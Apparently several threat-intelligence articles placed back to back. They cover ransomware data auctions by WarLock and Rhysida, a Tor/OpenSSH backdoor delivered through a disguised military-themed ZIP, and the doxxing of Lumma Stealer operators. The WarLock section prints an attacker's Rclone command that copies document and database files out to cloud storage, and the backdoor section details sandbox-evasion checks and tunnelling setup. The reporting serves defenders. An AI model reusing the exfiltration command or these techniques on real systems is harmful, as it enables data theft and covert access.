Ransomware has evolved from simple digital extortion into a structured, profit-driven criminal enterprise. Over time, it has led to the development of a complex ecosystem where stolen data is not only leveraged for ransom, but also sold to the highest bidder. This trend first gained traction in 2020 when the Pinchy Spider group, better known as REvil, pioneered the practice of hosting data auctions on the dark web, opening a new chapter in the commercialization of cybercrime.

In 2025, contemporary groups such as WarLock and Rhysida have embraced similar tactics, further normalizing data auctions as part of their extortion strategies. By opening additional profit streams and attracting more participants, these actors are amplifying both the frequency and impact of ransomware operations. The rise of data auctions reflects a maturing underground economy, one that mirrors legitimate market behavior, yet drives the continued expansion and professionalization of global ransomware activity.

Anatomy of victim data auctions 

Most modern ransomware groups employ double extortion tactics, exfiltrating data from a victim’s network before deploying encryption. Afterward, they publicly claim responsibility for the attack and threaten to release the stolen data unless their ransom demand is met. This dual-pressure technique significantly increases the likelihood of payment.

In recent years, data-only extortion campaigns, in which actors forgo encryption altogether, have risen sharply. In fact, such incidents doubled in 2025, highlighting how the threat of data exposure alone has become an effective extortion lever. Most ransomware operations, however, continue to use encryption as part of their attack chain.

Certain ransomware groups have advanced this strategy by introducing data auctions when ransom negotiations with victims fail. In these cases, threat actors invite potential buyers, such as competitors or other interested parties, to bid on the stolen data, often claiming it will be sold exclusively to a single purchaser. In some instances, groups have been observed selling partial datasets, likely adjusted to a buyer’s specific budget or area of interest, while any unsold data is typically published on dark web leak sites.

This process is illustrated in Figure 1, under the assumption that the threat actor adheres to their stated claims. However, in practice, there is no guarantee that the stolen data will remain undisclosed, even if the ransom is paid. This highlights the inherent unreliability of negotiating with cybercriminals.

⠀

⠀

This auction model provides an additional revenue stream, enabling ransomware groups to profit from exfiltrated data even when victims refuse to pay. It should be noted, however, that such auctions are often reserved for high-profile incidents. In these cases, the threat actors exploit the publicity surrounding attacks on prominent organizations to draw attention, attract potential buyers, and justify higher starting bids.

This trend is likely driven by the fragmentation of the ransomware ecosystem following the recent disruption of prominent threat actors, including 8Base and BlackSuit. This shift in cybercrime dynamics is compelling smaller, more agile groups to aggressively compete for visibility and profit through auctions and private sales to maintain financial viability. The emergence of the Crimson Collective in October 2025 exemplified this dynamic when the group auctioned stolen datasets to the highest bidder. Although short-lived, this incident served as a proof of concept (PoC) for the growing viability of monetizing data exfiltration independently of traditional ransom schemes.

Threat actor spotlight

WarLock

The WarLock ransomware group has been active since at least June 2025. The group targets organizations across North America, Europe, Asia, and Africa, spanning sectors from technology to critical infrastructure. Since its emergence, WarLock has rapidly gained prominence for its repeated exploitation of vulnerable Microsoft SharePoint servers, leveraging newly disclosed vulnerabilities to gain initial access to targeted systems.

The group adopts double extortion tactics, exfiltrating data from the victim’s systems before deploying its ransomware variant. From a recent incident Rapid7 responded to, we observed the threat actor exfiltrating the data from a victim to an S3 bucket using the tool Rclone. An anonymized version of the command used by the threat actor can be found below:

Rclone.exe copy \\localdirectory :s3 -P --include "*.{pdf,ai,dwg,dxf,dwt,doc,docx,dwg,dwt,dws,shx,pat,lin,ctb,dxf,dwf,step,stl,dst,dxb,,stp,ipt,prt,iges,obj,xlsx,mdf,sql,doc,xls,sql,bak,sqlite,db,sqlite3,sdf,ndf,ldf,csv,mdf,dbf,ibd,myd,ppt,pptx}" -q --ignore-existing --auto-confirm --multi-thread-streams 11 --transfers 11 --max-age 500d --max-size 2000m

WarLock operates a dedicated leak site (DLS) on the dark web, where it lists its victims. From the outset of its operations, the group has auctioned stolen data, publishing only the unsold information online (Figure 2). The group further mentions that the exfiltrated data may be sold to third parties if the victim refuses to pay in their ransom note (Figure 3).

⠀

⠀

⠀

Although WarLock shares updates on the progress and results of these auctions through its DLS, it also relies heavily on its presence on the RAMP4 cybercrime forum to attract potential buyers (Figure 4). This approach likely allows WarLock to reach a wider buyer base by publishing these posts under the relevant thread “Auction \ 拍卖会”. It should be noted that WarLock is assessed to be of Chinese origin, which is further supported by the Chinese-language reference in this thread title.

⠀

⠀

Using the alias “cnkjasdfgd,” the group advertises details about the nature and volume of exfiltrated data, along with sample files (Figure 5). WarLock further directs interested buyers to its Tox account, a peer-to-peer encrypted messaging and video-calling platform, where the auctions appear to take place.

⠀

⠀

This approach appears to be highly effective for WarLock. Despite being a recent entrant to the ransomware ecosystem, the group has reportedly sold victim data in approximately 55% of its claimed attacks, accounting for 55 victims to date as of November 2025, demonstrating significant traction within underground markets. The remaining victims’ data has been publicly released on the group’s DLS, following unsuccessful ransom negotiations and a lack of interested buyers.

Rhysida

The Rhysida ransomware group was first identified by cybersecurity researchers in May 2023. The group primarily targets Windows operating systems across both public and private organizations in sectors such as government, defense, education, and manufacturing. Its operations have been observed in several countries, including the United Kingdom, Switzerland, Australia, and Chile. The threat actors portray themselves as a so-called “cybersecurity team” that assists organizations in securing their networks by exposing system vulnerabilities.

Rhysida maintains an active DLS, where it publishes data belonging to victims who refuse to pay the ransom, in alignment with double extortion tactics. Since at least June 2023, the group has also conducted data auctions via a dedicated “Auctions Online” section of its DLS. These auctions typically run for seven days, and Rhysida claims that each dataset is sold exclusively to a single buyer. As of mid-October 2025, the group was hosting five ongoing auctions, with starting prices ranging from 5 to 10 Bitcoin (Figure 6).

⠀

⠀

Once the auction period ends, Rhysida publicly releases any unsold data on its DLS (Figure 7). Instead, if the auction is successful, the data is marked as “sold”, without being released on the group’s DLS (Figure 8). In many cases, the group publishes only a subset of the stolen data, often accompanied by the note “not sold data was published” (Figure 9).

⠀

⠀

⠀

⠀

With 224 claimed attacks to date as of November 2025, approximately 67% resulting in full or partial data sales, auctions represent a significant additional revenue stream for Rhysida. The group’s auction model appears to be considerably more effective than WarLock’s (Figure 10), likely due to Rhysida’s established reputation within the cybercrime ecosystem and its involvement in several high-profile attacks.

⠀

Conclusion

The cyber extortion ecosystem is undergoing a profound transformation, shifting from traditional ransom payments to a diversified, market-driven model centered on data auctions and direct sales. This evolution marks a turning point in how ransomware groups generate revenue, transforming what were once isolated extortion incidents into structured commercial transactions.

Groups such as WarLock and Rhysida exemplify this shift, illustrating how ransomware operations increasingly mirror illicit e-commerce ecosystems. By auctioning exfiltrated data, these actors not only create additional revenue streams but also reduce their dependence on ransom compliance, monetizing stolen data even when victims refuse to pay. This approach has proven particularly lucrative for these threat actors, likely setting a precedent for newer extortion groups eager to replicate their success.

As a result, proprietary and sensitive data, including personally identifiable and financial information, is flooding dark web marketplaces at an unprecedented pace. This expanding secondary market intensifies both the operational and reputational risks faced by affected organizations, extending the impact of an attack well beyond its initial compromise.

To adapt to this evolving threat landscape, organizations must move beyond reactive crisis management and embrace a proactive, intelligence-driven defense strategy. Continuous dark web monitoring, early breach detection, and the integration of cyber threat intelligence into response workflows are now essential. In a world where stolen data functions as a tradable commodity, resilience depends not on negotiation but on vigilance, preparedness, and rapid action.

Cyble Research and Intelligence Labs (CRIL) have uncovered a cyber-espionage operation that used a weaponized ZIP archive to infiltrate defense-sector systems. The malicious file—disguised as a Belarusian military document titled “ТЛГ на убытие на переподготовку.pdf” (“TLG for departure for retraining.pdf”)—delivered a highly advanced backdoor capable of establishing covert access through SSH and Tor.  The campaign specifically leveraged the Belarusian military theme to deceive personnel linked to Special Operations Command and those specializing in UAV or drone operations. CRIL’s findings suggest the attack aimed to gather intelligence about the region’s unmanned aerial capabilities or possibly mask the attacker’s true identity through a false-flag narrative.  This operation builds on methods first observed in the December 2024 “Army+” campaign, previously attributed to the Sandworm group (APT44/UAC-0125). The October 2025 version shows notable technical evolution, employing improved obfuscation, operational security, and anonymization measures. 

Infection Chain and Anti-Detection Measures 

The malicious ZIP archive was carefully constructed to evade both human suspicion and automated detection. Inside the ZIP archive, the victim would find an LNK shortcut masquerading as a PDF file and a hidden folder named “FOUND.000” containing another compressed file, persistentHandlerHashingEncodingScalable.zip. When executed, the LNK shortcut launched an obfuscated PowerShell script instead of opening a legitimate document.  The PowerShell payload extracted files to the %appdata%\logicpro directory and ran additional code that maintained stealth through obfuscation and environmental awareness. Before executing, it checked that the infected system contained at least ten recent shortcut files and fifty or more running processes—conditions typical of real user environments but not sandboxes. If these checks fail, the script terminates, effectively bypassing automated malware analysis systems.  While the decoy PDF was opened to distract the victim, the malware silently proceeded to install persistent services in the background. 

Scheduled Tasks, Persistence, and Backdoor Setup 

Persistence was achieved through scheduled tasks created using XML templates extracted from the ZIP archive. Two tasks were registered: one to deploy OpenSSH for Windows (renamed as githubdesktop.exe) and another to run a modified Tor client (renamed as pinterest.exe).  The OpenSSH binary established a local SSH service on port 20321 using only RSA key-based authentication, disabling passwords entirely. The authorized keys and configuration files were stored in hidden directories under AppData\Roaming\logicpro. In parallel, the Tor service created a hidden .onion address and forwarded several critical ports: 

• SSH (20322 → 127.0.0.1:20321) 
• SMB (11435 → 127.0.0.1:445) 
• RDP (13893 → 127.0.0.1:3389) 

To conceal traffic, the malware employed the obfs4 protocol, disguising Tor communications as legitimate network traffic. Two bridge relays—77.20.116.133:8080 and 156.67.24.239:33333—served as entry points into the Tor network.  Once connected, the malware generated a unique .onion hostname and sent it to the attacker’s command-and-control server via a curl command routed through the Tor SOCKS5 proxy. The command used 1,000 retries with three-second intervals to ensure successful data delivery. This process gave the attacker continuous, anonymous access to the compromised host. 

Attribution, Impact, and Defensive Measures 

CRIL’s analysis confirmed that the backdoor allowed full remote access through SSH, RDP, SFTP, and SMB channels, all tunneled through Tor for anonymity. Analysts verified the backdoor’s functionality by establishing a controlled SSH session using the embedded RSA keys and proxy configuration. No secondary payloads or lateral movements were detected, suggesting the attackers were in the reconnaissance phase.  The October 2025 sample closely resembles techniques used in the December 2024 Army+ campaign attributed to Sandworm (APT44). The overlap includes double-extension lures, scheduled task persistence, and the integration of OpenSSH and Tor for covert tunneling. Sandworm, associated with Russia’s GRU Unit 74455, has a long history of targeting Ukraine’s infrastructure, including the BlackEnergy attacks in 2015, the NotPetya outbreak in 2017, and a 2023 breach of Kyivstar.  Despite these similarities, CRIL maintains moderate confidence in linking this operation directly to Sandworm. The Belarusian military focus could reflect either an intelligence-gathering mission or a deliberate misdirection tactic.  To mitigate such threats, CRIL recommends that defense organizations: 

• Strengthen email filtering to detect nested or double-extension ZIP archives. 
• Train personnel to verify document authenticity through secondary channels. 
• Deploy a behavioral endpoint detection capable of flagging suspicious PowerShell activity and unauthorized scheduled tasks. 
• Block or monitor Tor and obfs4 traffic at the network level. 
• Audit SSH key usage and identify any OpenSSH instances running on non-standard ports. 

The prolific threat actors behind the Lumma Stealer malware have been slowed by an underground doxxing campaign in recent months. Coordinated law enforcement action earlier this year didn’t do much to slow down the infostealer’s spread, but a recent doxxing campaign appears to have had an impact, according to researchers at Trend Micro. “In September 2025, we noted a striking decline in new command and control infrastructure activity associated with Lummastealer ... as well as a significant reduction in the number of endpoints targeted by this notorious malware,” threat analyst Junestherry Dela Cruz wrote in a recent post. Fueling the drop has been an underground exposure campaign targeting a key administrator, developer and other members of the group, which Trend tracks as “Water Kurita.”

Lumma Stealer Doxxing Campaign Began in August

The Lumma Stealer doxxing campaign began in late August and continued into October, and on September 17, Lumma Stealer’s Telegram accounts were also compromised. “Allegedly driven by competitors, this campaign has unveiled personal and operational details of several supposed core members, leading to significant changes in Lummastealer’s infrastructure and communications,” Dela Cruz wrote. “This development is pivotal, marking a substantial shake-up in one of the most prominent information stealer malware operations of the year. ... The exposure of operator identities and infrastructure details, regardless of their accuracy, could have lasting repercussions on Lummastealer’s viability, customer trust, and the broader underground ecosystem.” The disclosures included highly sensitive details of five alleged Lumma Stealer operators, such as passport numbers, bank account information, email addresses, and links to online and social media profiles, and were leaked on a website called "Lumma Rats." While the campaign may have come from a rival, Dela Cruz said “the campaign’s consistency and depth suggest insider knowledge or access to compromised accounts and databases.” “The exposure campaign was accompanied by threats, accusations of betrayal within the cybercriminal community, and claims that the Lumma Stealer team had prioritized profit over the operational security of their clients,” Dela Cruz wrote. While the researcher noted that the accuracy of the doxed information hasn’t been verified, the accompanying decline in Lumma Stealer activity suggests that the group “has been severely affected—whether through loss of key personnel, erosion of trust, or fear of further exposure.”

Vidar, StealC Gain from Lumma Stealer’s Decline

Lumma Stealer’s decline has been a boon for rival infostealers like Vidar and StealC, Dela Cruz noted, “with many users reporting migrations to these platforms due to Lumma Stealer’s instability and loss of support.” Lumma’s decline has also hit pay-per-install (PPI) services like Amadey that are widely used to deliver infostealer payloads, and rival malware developers have stepped up their marketing efforts, “fueling rapid innovation and intensifying competition among MaaS [Malware as a Service] providers, raising the likelihood of new, stealthier infostealer variants entering the market,” Dela Cruz said. According to Cyble dark web data, Vidar and Redline are the infostealers most rivaling Lumma in volume on dark web marketplaces selling stolen credentials, with StealC, Acreed, Risepro, Rhadamanthys and Metastealer among other stealer logs commonly seen on the dark web. As for Lumma Stealer, Dela Cruz noted that being a top cybercrime group isn’t exactly a secure - pardon the pun - position to be in, as RansomHub found out earlier this year. “[B]eing number one means facing scrutiny and attacks from both defenders and competitors alike,” the researcher noted.